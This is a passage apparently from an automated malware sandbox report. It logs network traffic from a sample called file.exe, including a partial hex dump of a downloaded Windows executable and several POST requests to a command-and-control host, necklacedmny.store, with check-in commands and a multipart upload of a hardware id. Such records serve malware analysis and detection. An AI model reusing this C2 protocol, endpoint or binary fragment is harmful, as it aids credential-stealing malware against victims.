                                                                            Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 60 2b 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 a0 2b 00 00 04 00 00 d1 7b 2b 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                            Data Ascii: MZ@z!L!This program cannot be run in DOS mode.$PELP(,e"0$`+ `@ +{+`Ui` @ @.rsrc`2@.idata 8@bvojmhev**:@wyxhjguh @+*@.taggant@`+"*@
                                                                            Oct 29, 2024 14:11:39.524341106 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                            Data Ascii:
                                                                            Oct 29, 2024 14:11:39.524353981 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                            Data Ascii:
                                                                            Oct 29, 2024 14:11:39.524367094 CET636INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                            Data Ascii:
                                                                            Oct 29, 2024 14:11:39.524394035 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                            Data Ascii:
                                                                            Oct 29, 2024 14:11:39.524411917 CET212INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                            Data Ascii:
                                                                            Oct 29, 2024 14:11:39.525636911 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                            Data Ascii:
                                                                            Oct 29, 2024 14:11:39.525657892 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                            Data Ascii:
                                                                            Oct 29, 2024 14:11:39.525671005 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                            Data Ascii: 8$.N;
                                                                            Oct 29, 2024 14:11:39.525754929 CET1236INData Raw: 5e 03 96 a8 d2 4f 24 1b d7 f6 d4 52 ee aa 96 36 12 db d0 61 c9 c8 c3 13 10 14 9e 57 8f db cb 68 02 c8 a9 fc 0f 16 8e 9e 08 7a a0 e4 41 14 98 53 cc 91 56 4e 0a ff 2e 5d 51 9f b1 8f 09 fb 9b f6 cd c9 1b 94 8a 31 e8 99 c3 db 91 1b ff db 1b a5 08 66
                                                                            Data Ascii: ^O$R6aWhzASVN.]Q1fPzo*(=b%S_x<ztP5.y#Eps dARV+[1Jo)b4r?6WxD|"
                                                                            Oct 29, 2024 14:11:39.529934883 CET1236INData Raw: 07 33 91 f7 29 1d 92 9e 2f 34 8c 41 01 95 94 fa 31 0a c9 cc 4f 37 70 ee 34 3b fd 9a 08 15 75 f4 32 40 23 f2 35 17 81 5b be 26 ed a1 e4 04 f6 fa 38 2f df bb 3f 08 99 a4 4d 58 6b fa 2f 22 74 e5 35 32 8d 0e 11 1a e6 ab d1 34 ae f7 31 03 9f ee 22 cf
                                                                            Data Ascii: 3)/4A1O7p4;u2@#5[&8/?MXk/"t5241"#Gj'p^43h4U@k\,3B|u_qPOZgLY*eE,-$Jt/LFJ|a%?ydY"%8b6sV{<S+}z5^6|v/{IvJn


                                                                            HTTPS Proxied Packets

                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            0192.168.2.749737188.114.97.34437308C:\Users\user\Desktop\file.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-10-29 13:11:20 UTC265OUTPOST /api HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                            Content-Length: 8
                                                                            Host: necklacedmny.store
                                                                            2024-10-29 13:11:20 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                            Data Ascii: act=life
                                                                            2024-10-29 13:11:21 UTC1017INHTTP/1.1 200 OK
                                                                            Date: Tue, 29 Oct 2024 13:11:21 GMT
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Set-Cookie: PHPSESSID=9m8qciqdrm1ksgca7tnf47p1lg; expires=Sat, 22 Feb 2025 06:57:59 GMT; Max-Age=9999999; path=/
                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                            Pragma: no-cache
                                                                            cf-cache-status: DYNAMIC
                                                                            vary: accept-encoding
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OEBerskcpU4JqRtrulBfvHXHNTrZZpdNegMJtkpoTQzgT%2BQCCFugbj4AAi8et1%2Bk%2FeAFX%2FOSBCZYJQJLBzwlj6vB4mMbG%2BWleAa8i7khQltk5fzYQlq83wSBLS6NSIutSbdBoVs%3D"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 8da36932cc4c3178-DFW
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1346&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2844&recv_bytes=909&delivery_rate=2064148&cwnd=242&unsent_bytes=0&cid=084097283e4019ac&ts=526&x=0"
                                                                            2024-10-29 13:11:21 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                            Data Ascii: 2ok
                                                                            2024-10-29 13:11:21 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                            Data Ascii: 0


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            1192.168.2.749743188.114.97.34437308C:\Users\user\Desktop\file.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-10-29 13:11:21 UTC266OUTPOST /api HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                            Content-Length: 52
                                                                            Host: necklacedmny.store
                                                                            2024-10-29 13:11:21 UTC52OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e 64 61 72 79 79 26 6a 3d
                                                                            Data Ascii: act=recive_message&ver=4.0&lid=4SD0y4--legendaryy&j=
                                                                            2024-10-29 13:11:22 UTC1015INHTTP/1.1 200 OK
                                                                            Date: Tue, 29 Oct 2024 13:11:22 GMT
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Set-Cookie: PHPSESSID=bb7asq8711c2kb8qbglfjqk44t; expires=Sat, 22 Feb 2025 06:58:01 GMT; Max-Age=9999999; path=/
                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                            Pragma: no-cache
                                                                            cf-cache-status: DYNAMIC
                                                                            vary: accept-encoding
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OvvRaRPAki7TtcSXWPGKLspPDAhFBRKx40Uqs%2FkHet8NT2okCmszVL8q4ODtgJ51cqqY8ncrmkJNm9iODPSfG%2BmZzicrr4DwWVchDOF5X%2FM%2Fxy0MMoRgETvUVl4MTn69Yy2yNA4%3D"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 8da36939fd0a479a-DFW
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1986&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2844&recv_bytes=954&delivery_rate=1445109&cwnd=252&unsent_bytes=0&cid=efb124cc00e37250&ts=515&x=0"
                                                                            2024-10-29 13:11:22 UTC354INData Raw: 31 64 38 36 0d 0a 49 42 6d 37 47 78 6d 54 2f 63 31 31 2b 2b 2b 58 72 6f 71 70 41 53 63 7a 34 54 70 6b 32 41 41 76 4e 4c 5a 33 44 36 78 57 79 6b 56 62 4f 38 30 35 49 36 66 52 37 77 61 65 7a 61 33 61 2b 4e 78 6b 43 78 47 41 58 6b 62 69 5a 6b 35 59 78 52 49 6a 6a 69 43 6e 5a 78 70 2f 32 6e 64 71 39 74 48 76 45 49 50 4e 72 66 58 78 69 32 52 4a 45 64 73 59 41 62 4a 69 54 6c 6a 55 46 6d 54 44 4a 71 59 6d 53 48 58 63 63 33 7a 77 6d 61 77 5a 6c 6f 72 79 79 2b 76 44 62 30 35 65 69 56 64 47 39 43 4a 4b 54 70 52 4e 4c 65 45 7a 76 69 52 74 65 4d 68 77 4f 2b 37 52 74 6c 65 65 67 62 57 55 71 4d 68 6b 52 56 2b 48 58 67 2b 77 61 45 64 51 31 52 4e 6c 33 44 2b 73 4c 55 68 37 33 33 4a 32 2b 59 32 68 45 35 47 42 39 4d 48 72 69 79 30 46 56 70 73 59 58 76 6f 78 66 31 58 46 42
                                                                            Data Ascii: 1d86IBm7GxmT/c11+++XroqpAScz4Tpk2AAvNLZ3D6xWykVbO805I6fR7waeza3a+NxkCxGAXkbiZk5YxRIjjiCnZxp/2ndq9tHvEIPNrfXxi2RJEdsYAbJiTljUFmTDJqYmSHXcc3zwmawZloryy+vDb05eiVdG9CJKTpRNLeEzviRteMhwO+7RtleegbWUqMhkRV+HXg+waEdQ1RNl3D+sLUh733J2+Y2hE5GB9MHriy0FVpsYXvoxf1XFB
                                                                            2024-10-29 13:11:22 UTC1369INData Raw: 2f 4a 2b 39 48 35 4b 47 38 4e 37 6a 77 6d 35 49 55 59 35 53 43 62 6c 69 53 6c 7a 65 47 6d 66 4b 4f 61 55 68 51 6e 75 5a 4e 7a 76 32 68 2b 39 50 32 61 37 77 33 4f 2f 48 64 51 64 72 77 30 64 49 6f 79 4a 4b 57 70 52 4e 4c 63 59 78 71 79 52 4a 64 4e 70 78 63 4f 4f 66 76 52 47 55 69 4f 66 4b 37 63 56 70 52 6b 4f 4a 56 67 43 35 61 30 5a 66 30 52 4a 70 6a 6e 72 6f 49 46 6f 37 67 54 6c 61 2f 4a 53 6a 48 59 36 4e 74 64 4f 6d 30 69 4e 43 58 63 4d 41 52 72 35 6a 53 56 66 51 47 32 50 4b 4f 4b 34 70 54 33 54 66 63 33 76 32 6c 61 63 66 6d 49 44 2b 77 2b 6a 4f 62 6b 46 58 6a 31 6b 44 2b 69 77 4e 55 63 78 56 4e 59 34 61 72 79 52 51 4f 65 78 36 64 66 2b 59 75 56 65 47 77 2b 79 4d 37 38 63 6a 48 52 47 4e 58 51 6d 6f 59 31 39 54 32 67 64 68 79 7a 4b 6c 4a 45 78 37 33 48 35
                                                                            Data Ascii: /J+9H5KG8N7jwm5IUY5SCbliSlzeGmfKOaUhQnuZNzv2h+9P2a7w3O/HdQdrw0dIoyJKWpRNLcYxqyRJdNpxcOOfvRGUiOfK7cVpRkOJVgC5a0Zf0RJpjnroIFo7gTla/JSjHY6NtdOm0iNCXcMARr5jSVfQG2PKOK4pT3Tfc3v2lacfmID+w+jObkFXj1kD+iwNUcxVNY4aryRQOex6df+YuVeGw+yM78cjHRGNXQmoY19T2gdhyzKlJEx73H5
                                                                            2024-10-29 13:11:22 UTC1369INData Raw: 56 65 47 77 2b 79 4d 37 38 63 6a 48 52 47 50 55 51 61 78 61 45 6c 57 30 78 68 6f 7a 54 4f 72 4b 6b 56 78 31 33 35 2f 2f 5a 61 69 45 5a 6d 4b 38 63 6e 36 7a 6d 70 4a 58 63 4d 57 52 72 31 36 44 51 36 55 4f 6d 72 59 4e 34 63 6b 55 33 4b 5a 5a 6a 58 6f 33 36 67 62 32 64 57 31 79 2b 33 44 61 45 4e 5a 67 30 6f 44 74 47 6c 4d 58 4e 49 55 59 4d 49 79 71 43 5a 43 66 64 56 35 66 50 61 4e 76 52 4b 66 6e 2f 2b 4d 70 6f 74 6b 58 52 48 62 47 44 43 71 64 56 78 41 6c 69 42 75 77 44 71 76 4d 51 4a 6b 6c 32 41 37 39 70 50 76 54 39 6d 47 39 63 44 76 77 32 56 42 57 59 78 58 44 36 68 6a 51 56 6a 47 45 6d 33 48 4f 71 63 72 53 33 62 65 64 48 44 37 6b 71 73 51 6d 4d 32 37 6a 4f 2f 54 49 78 30 52 74 55 67 4c 74 6b 78 47 57 74 31 56 63 6f 41 74 36 43 42 4f 4f 34 45 35 66 2f 32 58
                                                                            Data Ascii: VeGw+yM78cjHRGPUQaxaElW0xhozTOrKkVx135//ZaiEZmK8cn6zmpJXcMWRr16DQ6UOmrYN4ckU3KZZjXo36gb2dW1y+3DaENZg0oDtGlMXNIUYMIyqCZCfdV5fPaNvRKfn/+MpotkXRHbGDCqdVxAliBuwDqvMQJkl2A79pPvT9mG9cDvw2VBWYxXD6hjQVjGEm3HOqcrS3bedHD7kqsQmM27jO/TIx0RtUgLtkxGWt1VcoAt6CBOO4E5f/2X
                                                                            2024-10-29 13:11:22 UTC1369INData Raw: 6a 77 79 4f 2f 50 5a 55 6f 52 7a 52 67 42 6f 69 49 56 46 76 73 79 57 49 77 56 6b 6d 64 64 4e 63 41 35 66 50 33 66 39 31 65 56 6a 76 6e 45 35 38 31 71 53 56 75 4b 55 77 71 78 5a 6b 46 66 30 52 4e 73 79 7a 47 70 49 30 35 78 33 33 70 34 2f 70 43 67 48 39 6e 44 74 63 76 77 69 7a 73 46 64 4a 52 54 43 4c 77 69 55 68 6a 4e 56 57 72 43 64 50 42 6e 54 6e 4c 66 66 33 37 39 6e 71 6b 66 6e 49 58 78 7a 65 37 4e 59 45 70 56 68 6c 6b 4a 76 6d 35 44 58 4e 55 55 59 63 55 37 6f 79 49 43 4e 5a 6c 2b 59 37 48 48 37 79 61 61 6d 2b 4c 63 35 49 74 38 43 30 6a 44 58 77 72 36 4f 67 31 58 78 68 39 6e 77 44 47 6e 49 6b 46 30 33 6e 52 39 2f 5a 57 6d 48 35 2b 43 2f 4e 37 72 78 32 31 43 58 34 39 57 43 37 42 68 51 42 61 61 56 57 72 57 64 50 42 6e 62 6e 7a 55 56 33 44 39 6d 4f 38 49 31
                                                                            Data Ascii: jwyO/PZUoRzRgBoiIVFvsyWIwVkmddNcA5fP3f91eVjvnE581qSVuKUwqxZkFf0RNsyzGpI05x33p4/pCgH9nDtcvwizsFdJRTCLwiUhjNVWrCdPBnTnLff379nqkfnIXxze7NYEpVhlkJvm5DXNUUYcU7oyICNZl+Y7HH7yaam+Lc5It8C0jDXwr6Og1Xxh9nwDGnIkF03nR9/ZWmH5+C/N7rx21CX49WC7BhQBaaVWrWdPBnbnzUV3D9mO8I1
                                                                            2024-10-29 13:11:22 UTC1369INData Raw: 6f 7a 48 73 46 43 63 4e 75 41 61 70 79 54 68 54 6c 41 32 37 59 50 36 55 72 41 6d 53 58 59 44 76 32 6b 2b 39 50 32 59 76 36 78 65 76 45 59 6b 78 64 6a 6c 30 50 76 32 4e 4c 55 74 34 66 62 63 67 79 71 53 4a 49 65 4e 68 7a 63 76 61 58 71 42 53 4c 7a 62 75 4d 37 39 4d 6a 48 52 47 71 58 78 53 30 63 67 31 4a 6d 67 77 74 79 54 6a 6f 66 77 4a 2f 30 33 5a 2f 39 70 4f 70 45 70 2b 41 39 4d 50 70 79 32 78 42 57 6f 70 65 42 37 64 6e 51 46 4c 47 48 32 62 42 4f 4b 45 72 54 7a 75 58 4f 58 7a 70 33 2f 64 58 71 49 44 37 77 75 2f 64 49 31 6f 66 6d 68 67 42 74 69 49 56 46 74 55 5a 59 73 30 37 71 79 52 44 63 63 74 72 64 2f 69 58 71 68 75 53 67 2f 50 65 37 73 52 71 52 6c 4b 4b 58 77 36 32 61 45 35 52 6c 46 73 74 79 53 7a 6f 66 77 4a 59 7a 6d 6c 32 73 59 44 68 44 74 6d 4b 2b 59
                                                                            Data Ascii: ozHsFCcNuAapyThTlA27YP6UrAmSXYDv2k+9P2Yv6xevEYkxdjl0Pv2NLUt4fbcgyqSJIeNhzcvaXqBSLzbuM79MjHRGqXxS0cg1JmgwtyTjofwJ/03Z/9pOpEp+A9MPpy2xBWopeB7dnQFLGH2bBOKErTzuXOXzp3/dXqID7wu/dI1ofmhgBtiIVFtUZYs07qyRDcctrd/iXqhuSg/Pe7sRqRlKKXw62aE5RlFstySzofwJYzml2sYDhDtmK+Y
                                                                            2024-10-29 13:11:22 UTC1369INData Raw: 56 31 53 46 56 77 6d 7a 61 30 6c 65 31 78 56 70 79 6a 4f 74 4a 45 35 77 33 6e 70 30 39 5a 61 68 48 70 62 4e 75 34 7a 76 30 79 4d 64 45 61 4a 44 42 62 5a 76 44 55 6d 61 44 43 33 4a 4f 4f 68 2f 41 6e 66 58 66 48 76 37 6d 61 73 53 6e 34 66 77 7a 4f 50 49 62 45 46 58 68 31 63 47 73 57 74 4d 55 4e 45 66 5a 73 67 35 71 79 46 45 4f 35 63 35 66 4f 6e 66 39 31 65 35 6c 76 6a 41 37 34 74 38 43 30 6a 44 58 77 72 36 4f 67 31 64 32 42 46 71 7a 6a 6d 72 4c 30 64 2f 30 33 78 37 2b 59 32 6e 46 35 36 66 35 38 7a 68 7a 6d 39 47 55 59 64 65 44 37 78 68 53 52 61 61 56 57 72 57 64 50 42 6e 62 33 66 65 55 48 7a 71 33 37 42 5a 67 4d 33 79 77 4b 69 54 49 30 52 61 69 56 63 4c 75 57 52 4f 58 64 45 66 62 4d 6b 38 70 54 56 42 64 4e 5a 39 65 2f 36 5a 71 52 61 57 69 2f 4c 46 36 63 4e
                                                                            Data Ascii: V1SFVwmza0le1xVpyjOtJE5w3np09ZahHpbNu4zv0yMdEaJDBbZvDUmaDC3JOOh/AnfXfHv7masSn4fwzOPIbEFXh1cGsWtMUNEfZsg5qyFEO5c5fOnf91e5lvjA74t8C0jDXwr6Og1d2BFqzjmrL0d/03x7+Y2nF56f58zhzm9GUYdeD7xhSRaaVWrWdPBnb3feUHzq37BZgM3ywKiTI0RaiVcLuWROXdEfbMk8pTVBdNZ9e/6ZqRaWi/LF6cN
                                                                            2024-10-29 13:11:22 UTC367INData Raw: 57 59 68 72 47 68 4b 52 74 4d 43 59 6f 35 36 36 43 67 43 49 2b 41 35 63 76 61 45 76 67 47 55 6e 66 4b 4d 31 34 55 6a 58 52 48 62 47 44 4f 35 62 45 4e 52 77 67 51 67 36 53 4b 69 49 46 4a 38 7a 6e 59 37 76 39 2b 70 56 38 48 65 75 34 7a 73 32 69 4d 64 41 64 45 44 55 2b 6b 31 48 51 54 4c 57 33 53 4f 49 75 68 2f 45 44 57 5a 61 7a 75 70 33 2b 67 55 69 35 2f 7a 7a 2f 37 49 4a 48 74 76 70 45 49 4c 76 48 56 63 61 4f 6f 53 64 38 4d 79 76 7a 59 4f 62 74 70 33 64 66 61 4a 37 31 6e 5a 67 72 57 55 30 59 73 72 42 57 37 4e 47 42 37 36 4f 67 31 6a 31 78 74 6a 79 53 4b 35 61 6d 56 68 31 48 39 73 34 4e 2f 68 56 35 2f 4e 72 5a 79 6d 69 32 64 55 45 64 73 49 56 4f 45 33 48 67 47 45 52 33 4b 41 4c 65 67 78 41 69 4f 4c 4e 7a 76 6a 33 2f 64 58 33 6f 37 6e 33 75 37 49 64 55 59 57
                                                                            Data Ascii: WYhrGhKRtMCYo566CgCI+A5cvaEvgGUnfKM14UjXRHbGDO5bENRwgQg6SKiIFJ8znY7v9+pV8Heu4zs2iMdAdEDU+k1HQTLW3SOIuh/EDWZazup3+gUi5/zz/7IJHtvpEILvHVcaOoSd8MyvzYObtp3dfaJ71nZgrWU0YsrBW7NGB76Og1j1xtjySK5amVh1H9s4N/hV5/NrZymi2dUEdsIVOE3HgGER3KALegxAiOLNzvj3/dX3o7n3u7IdUYW
                                                                            2024-10-29 13:11:22 UTC1369INData Raw: 32 32 31 37 0d 0a 4f 78 32 4b 77 46 69 34 76 32 32 75 75 4d 58 58 74 53 6c 56 55 4a 73 57 4e 7a 61 50 6f 59 62 4d 30 36 36 68 5a 55 64 73 6c 36 66 76 61 68 6b 52 6d 65 6d 66 4c 43 37 73 73 6a 43 78 47 4d 47 46 36 44 49 67 55 57 36 31 73 74 31 6e 54 77 5a 33 64 34 31 33 64 38 35 34 37 69 4e 49 2b 41 2b 73 66 70 69 79 30 46 56 38 4d 41 56 76 51 69 53 55 65 55 54 54 32 63 62 2f 31 30 46 53 75 4c 5a 6a 58 6f 33 37 6c 58 77 64 2b 37 6a 50 71 4c 4f 77 55 57 6a 56 55 48 75 57 78 4f 52 4d 59 54 62 74 67 33 37 78 6c 38 57 74 52 79 64 2f 79 51 70 43 6d 6e 72 50 6a 48 35 4d 5a 73 54 6d 2b 39 54 51 57 30 62 45 70 41 78 56 55 6a 6a 6a 76 6f 66 33 73 37 6b 54 6c 45 76 39 2b 33 56 38 48 4e 77 4d 2f 6d 78 57 52 54 51 4d 35 35 43 37 46 75 51 46 6e 66 56 53 4f 4f 4d 75 68
                                                                            Data Ascii: 2217Ox2KwFi4v22uuMXXtSlVUJsWNzaPoYbM066hZUdsl6fvahkRmemfLC7ssjCxGMGF6DIgUW61st1nTwZ3d413d8547iNI+A+sfpiy0FV8MAVvQiSUeUTT2cb/10FSuLZjXo37lXwd+7jPqLOwUWjVUHuWxORMYTbtg37xl8WtRyd/yQpCmnrPjH5MZsTm+9TQW0bEpAxVUjjjvof3s7kTlEv9+3V8HNwM/mxWRTQM55C7FuQFnfVSOOMuh
                                                                            2024-10-29 13:11:22 UTC1369INData Raw: 6b 64 46 31 49 69 73 42 35 2b 4f 79 2f 4c 44 78 32 56 43 53 34 52 65 49 4a 6f 69 41 78 62 62 56 54 58 33 64 4f 42 6e 66 54 57 5a 59 54 75 70 33 35 6f 55 6c 34 50 79 32 76 6d 47 52 6c 4a 53 6b 31 34 46 2b 69 77 4e 55 4a 52 4e 50 59 42 30 72 44 59 43 49 34 6b 72 49 4b 54 4d 2b 45 66 4c 6b 72 76 56 71 4e 30 6a 48 51 50 4e 47 42 54 36 4f 67 30 52 31 77 64 2f 79 44 65 2b 4a 41 56 46 35 31 39 34 34 4a 57 4f 47 6f 6d 4b 79 2f 4c 39 79 47 31 4c 56 70 56 4a 52 76 51 69 51 68 61 4d 4c 43 32 47 65 4b 34 6b 56 44 76 6d 4e 7a 76 70 33 2f 64 58 72 49 37 37 77 75 2f 64 63 67 68 33 67 45 6b 4d 6d 32 39 64 55 5a 52 62 4c 63 68 30 38 48 51 4d 4f 39 31 6f 4f 36 6e 50 2f 55 7a 4d 33 71 4b 63 75 74 51 74 58 42 47 56 47 46 37 6f 4c 41 31 45 6c 45 30 74 69 54 65 36 4e 55 52 34
                                                                            Data Ascii: kdF1IisB5+Oy/LDx2VCS4ReIJoiAxbbVTX3dOBnfTWZYTup35oUl4Py2vmGRlJSk14F+iwNUJRNPYB0rDYCI4krIKTM+EfLkrvVqN0jHQPNGBT6Og0R1wd/yDe+JAVF51944JWOGomKy/L9yG1LVpVJRvQiQhaMLC2GeK4kVDvmNzvp3/dXrI77wu/dcgh3gEkMm29dUZRbLch08HQMO91oO6nP/UzM3qKcutQtXBGVGF7oLA1ElE0tiTe6NUR4


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            2192.168.2.749753188.114.97.34437308C:\Users\user\Desktop\file.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-10-29 13:11:23 UTC284OUTPOST /api HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                            Content-Length: 12849
                                                                            Host: necklacedmny.store
                                                                            2024-10-29 13:11:23 UTC12849OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 34 39 36 30 39 39 46 38 38 42 45 38 38 32 44 31 41 39 41 42 36 33 34 43 37 37 42 38 36 31 37 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e
                                                                            Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"5496099F88BE882D1A9AB634C77B8617--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"4SD0y4--legen
                                                                            2024-10-29 13:11:27 UTC1021INHTTP/1.1 200 OK
                                                                            Date: Tue, 29 Oct 2024 13:11:27 GMT
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Set-Cookie: PHPSESSID=orosu8io54amqudk397qmuma3o; expires=Sat, 22 Feb 2025 06:58:02 GMT; Max-Age=9999999; path=/
                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                            Pragma: no-cache
                                                                            cf-cache-status: DYNAMIC
                                                                            vary: accept-encoding
